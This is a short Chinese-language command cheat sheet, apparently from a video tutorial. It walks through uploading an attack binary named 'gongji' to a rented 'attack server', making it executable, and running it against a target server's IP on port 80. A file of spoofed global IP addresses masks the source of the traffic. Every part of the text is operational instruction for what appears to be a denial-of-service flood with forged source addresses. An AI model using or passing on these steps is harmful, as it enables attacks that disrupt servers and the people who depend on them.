yum install -y lrzsz          本命令是centos允许  本机电脑的文件上传到攻击服务器 的配置安装
apt-get install lrzsz         本命令是debian允许  本机电脑的文件上传到攻击服务器 的配置安装

rz                                     本命令是选择本机文件 进行上传到攻击服务器

rz -y                                 本命令是覆盖上传攻击服务器 已经有的相同文件名的文件 


chmod 777 gongji          本命令是 给gongji  这个文件  最高的执行权限


./gongji IP 80 worldip.txt 2 -1 60       本命令的IP 需要手工替换成目标服务器的IP地址，
                                                             本命令的worldip文件是伪装的全球IP文件。
                                                             
录制本视频时    我有一台之前租用的风车机房centos系统无限总流量的服务器，所以拿centos系统做了视频实战演示，如果操作时， 建议用debian，debian系统稳定性更强。